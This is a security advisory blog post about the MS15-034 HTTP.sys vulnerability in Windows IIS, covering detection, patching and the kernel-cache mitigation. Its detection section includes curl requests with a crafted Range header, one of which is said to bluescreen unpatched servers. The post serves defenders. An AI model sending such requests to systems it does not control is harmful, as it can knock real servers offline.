CLOSE
CLOSE
https://www.sikich.com

MS15-034 Critical Windows Vulnerability: What You Need to Know Now

On April 14, Microsoft released a critical security patch (MS15-034) for the HTTP protocol stack, which is commonly used by Windows IIS web services. While it doesn’t have a catchy nickname (it’s just called the MS15-034 Critical Windows Vulnerability) or slick logo, there have been some good discussions around it, and this is a serious vulnerability that affects millions of Internet-facing web servers.

Attackers are racing to reverse engineer this patch to remotely execute code and take over vulnerable systems. Right now, by sending a single, specially crafted HTTP request, an attacker can crash unpatched Windows web servers.

The patch supplied by Microsoft should be applied immediately. This vulnerability exists within HTTP.sys and is exploitable when the kernel caching feature of IIS is enabled. Kernel caching is enabled by default. Kernel caching can be disabled to mitigate this vulnerability in cases where a patch cannot be immediately applied.

Detecting the Vulnerability

The vulnerability can be triggered by specifying the Range header in an HTTP request. A vulnerable install will respond with an HTTP 416 Requested Range Not Satisfiable error.

#curl -v http://vulnerable.example.com/ -H "Range: bytes=00-18446744073709551615"

---snip---

< HTTP/1.1 416 Requested Range Not Satisfiable
< Content-Type: text/html
< Last-Modified: Mon, 03 Feb 2014 22:08:50 GMT
< Accept-Ranges: bytes
< ETag: "3fa4eb842c21cf1:0"
< Server: Microsoft-IIS/7.5
< Date: Thu, 16 Apr 2015 02:10:24 GMT
< Content-Length: 362
< Content-Range: bytes */151

Specifying a valid file and byte range of 100 will result in a bluescreen.

#curl -v http://vulnerable.example.com/image.jpg -H "Range: bytes=100-18446744073709551615"

A patched install will respond with an HTTP 400 Bad Request error.

#curl -v http://vulnerable.example.com/ -H "Range: bytes=00-18446744073709551615"

---snip---

< HTTP/1.1 400 Bad Request
< Content-Type: text/html; charset=us-ascii
< Server: Microsoft-HTTPAPI/2.0
< Date: Thu, 16 Apr 2015 00:53:17 GMT
< Connection: close
< Content-Length: 339

Note: This exploitation was tested on an unpatched Windows 2008 R2 default IIS installation.

Mitigation for MS15-034

If the MS15-034 patch cannot be installed, the kernel caching feature can be disabled to prevent exploitation.

To disable kernel caching:

  1. Open IIS Manager
  2. In Features View, double-click Output Caching
  3. On the Output Caching page, in the Actions pane, click Edit feature settings
  4. In the Edit Output Cache Settings dialog box, deselect Enable kernel cache and then click OK

Have any questions about fixing the MS15-034 Critical Windows Vulnerability? Please reach out to our experts at any time!

This publication contains general information only and Sikich is not, by means of this publication, rendering accounting, business, financial, investment, legal, tax, or any other professional advice or services. This publication is not a substitute for such professional advice or services, nor should you use it as a basis for any decision, action or omission that may affect you or your business. Before making any decision, taking any action or omitting an action that may affect you or your business, you should consult a qualified professional advisor. In addition, this publication may contain certain content generated by an artificial intelligence (AI) language model. You acknowledge that Sikich shall not be responsible for any loss sustained by you or any person who relies on this publication.

About the Author